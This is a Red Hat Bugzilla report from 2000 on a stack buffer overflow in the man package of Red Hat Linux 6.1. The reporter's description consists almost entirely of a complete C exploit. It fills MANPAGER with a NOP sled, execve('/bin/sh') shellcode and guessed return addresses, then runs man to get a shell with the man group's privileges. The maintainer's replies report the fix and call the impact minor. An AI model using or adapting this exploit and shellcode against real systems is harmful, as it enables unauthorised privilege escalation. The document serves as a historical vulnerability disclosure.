Bug 9892 - PAGER env variable can be overflowed...
Summary: PAGER env variable can be overflowed...
Keywords:
Status: CLOSED RAWHIDE
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: man
Version: 6.1
Hardware: i386
OS: Linux
Priority: medium
Severity: medium
Target Milestone: ---
Assignee: Bernhard Rosenkraenzer
QA Contact:
URL:
Whiteboard:
Duplicates: 10338
Depends On:
Blocks:
Reported: 2000-03-01 15:04 UTC by mathew
Modified: 2008-05-01 15:37 UTC (History)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2000-03-01 15:50:35 UTC
Embargoed:



Description mathew 2000-03-01 15:04:49 UTC
DOH!


/*
 * (c) 2000 babcia padlina / b0f
 * (lcamtufs idea)
 *
 * redhat 6.1 /usr/bin/man exploit
 *
 * Builds MANPAGER as a NOP sled, an execve("/bin/sh") shellcode and a
 * block of repeated guessed return addresses, then execs man, which
 * copies the value into a fixed-size stack buffer.  i386 only.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/stat.h>

#define NOP     0x90
#define OFS     1800    /* default distance from our %esp to the guessed return address */
#define BUFSIZE 4002    /* NOP sled + shellcode */
#define ADDRS   1000    /* bytes of repeated return address appended after the shellcode */

long getesp(void) { __asm__("movl %esp, %eax\n"); }

int main(int argc, char **argv)
{
    char *execshell =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    char *buf, *p;
    int noplen, i, ofs;
    long ret, *ap;

    if (!(buf = (char *)malloc(BUFSIZE + ADDRS + 1))) {
        perror("malloc()");
        return -1;
    }
    if (argc > 1)
        ofs = atoi(argv[1]);
    else
        ofs = OFS;
    noplen = BUFSIZE - strlen(execshell);
    ret = getesp() + ofs;

    memset(buf, NOP, noplen);
    buf[noplen] = '\0';             /* terminate the sled so strcat appends right after it */
    strcat(buf, execshell);
    p = buf + noplen + strlen(execshell);
    ap = (long *)p;
    for (i = 0; i < ADDRS / 4; i++) /* fill the tail with the guessed return address */
        *ap++ = ret;
    p = (char *)ap;
    *p = '\0';

    fprintf(stderr, "RET: 0x%lx len: %d\n\n", ret, (int)strlen(buf));
    setenv("MANPAGER", buf, 1);
    execl("/usr/bin/man", "man", "ls", (char *)0);
    return 0;
}

Comment 1 Bernhard Rosenkraenzer 2000-03-01 15:50:59 UTC
This is fixed in the 2 most recent rawhide packages (1.5g-8 and 1.5h1-1).
It's not a serious problem though; at worst you can get setgid man, meaning you
can write to /var/catman.

Comment 2 Bernhard Rosenkraenzer 2000-03-25 02:35:59 UTC
*** Bug 10338 has been marked as a duplicate of this bug. ***

